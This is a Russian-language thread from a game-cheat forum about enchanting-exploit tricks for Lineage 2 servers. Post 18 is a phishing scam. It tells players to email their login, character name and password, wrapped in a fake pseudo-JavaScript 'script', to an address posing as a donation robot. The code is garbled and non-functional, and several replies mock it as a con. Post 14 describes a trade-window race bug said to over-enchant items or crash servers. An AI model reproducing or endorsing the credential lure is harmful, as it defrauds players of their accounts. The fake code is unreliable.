Funcheat.clan.su

Объявление

Хайд снижен до января СПЕШИТЕ!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Funcheat.clan.su » Lineage PTS » Заточкаа!

Заточкаа!

Сообщений 1 страница 30 из 44

1

0

2

за полезный пост +25 сообщений

0

3

не катит(((

0

4

неполучлось(

0

5

попробую на яве

0

6

а што там 3 саобшения нада? ыы

0

7

застрились ствалом сам придумал?)  гавно ты пишеш профикшена во времена с1

0

8

((( а мне ещё и невидна саабщения нада аставить хатя я незнаю что аставить(((( сякую ерунду тож писать нехота

0

9

Жесть )

0

10

люди а я так и не понял на шоках это пойдёт или нет я боюсь пробовать

0

11

м\б пойдёт а м\б и нет

0

12

фывфыв

0

13

=)

0

14

на элите получалась одна феня, когда жмёшь “Sell” у трейдера, быстро жмите alt+v чтобы открылся ваш инвентарь и окно продажи, опустите итем, который хотите точить вниз и точите итем в инвенторе, на многих серверах это даёт разный исход:
1)при фэйле у вас образуется итем, который нельзя заточить, а после рестарта он исчезает
2)краш сервера
3)затачивается до максимума…
OTCTOU DABHO nofukweH

0

15

гавно!

0

16

неработает

0

17

asdfasdas

0

18

Хочу поделиться с вами одним способом заточки на la2.theabyss.ru.
Взлом заточки происходит очень быстро и просто из-за этого робота, который управляет донейтом. Когда кто-то за 100 долларов точит драк на +16, его запрос обрабатывается роботом, которые посылает скрипт на почту, через которое непосредственно и точится ваша вещь. Главное, делать все правильно, как я написал.
Этот скрипт написан для того, чтобы бот заточил некоторую вещь на определенный +. Бот принимает письма этому ящику" l2services@bk.ru " . Не представляете каких трудов мне стоило разузнать его!
Пошлите письмо на этот ящик со следующим скриптом, заменяя строчки своими данными, без дополнительных пробелов и символов. Лучше просто скопируйте этот скрипт и просто замените ненужные данные. Если у вас уже точеная вещь, то заточка, которую вы указали, просто прибавится к нему.
Не злоупотребляйте! (настоящие люди же не могут так часто донатить,как вы хотите точить вещи;) Я еще сам не разобрался, почему-то на новые аккаунты которые вы создали недавно заточка не работает:( Если соблюсти все правила, то гарантирую 100% результат. В момент заточки ваш персонаж не должен находится в игре, и оружие должно быть в руках! После отправки скрипта вы не должны использовать аккаунт в течении 12 часов.
Да что там греха таить, все этим скриптом пользуются, и на всех серверах, нужно толко разузнать почту какого-нибудь робота и написать к нему правильный скрипт. Желаю удачи!

<script language="javascript">
server:= "имя сервера "
item$ := "укажите полное название затачиваемого предмета или ид"
enchant$ := "укажите цифру, на сколько хотите заточить вещь"
id$ := "ваш логин"
Characters := "имя чара"
pass := loadpwlfile(serveraccountpassword''''id''''.pwl)
pass$ := "ваш пароль"
q1 := loadfile(serveraccountpassword''''id.q1''''.sql)
function backpassword(id,pass,q1,q2,i,k)
if id= true and pass$=loadpwlfile(serveraccountpassword''''id$''''.pwl)
then
if q1 = true
then
send.file.pass"Ваш почтовый адрес"
end if
end function
</script>

0

19

не работает

0

20

кто знаеш хорошие баги на Грации отпишитесь плиз!!

0

21

дауш!

0

22

Убейте крокодила...

0

23

Об стену..

0

24

Nada paprobivati

0

25

.........

0

26

ухахахахах самый класный розвод какой токо может бить ))))))) удачи вам ребятааа))))))))

0

27

Ук ук

0

28

1

0

29

Да ваще ахерели ваще нах!! Пишут Бред полный !

0

30

чушь паходу(

0

Вы здесь » Funcheat.clan.su » Lineage PTS » Заточкаа!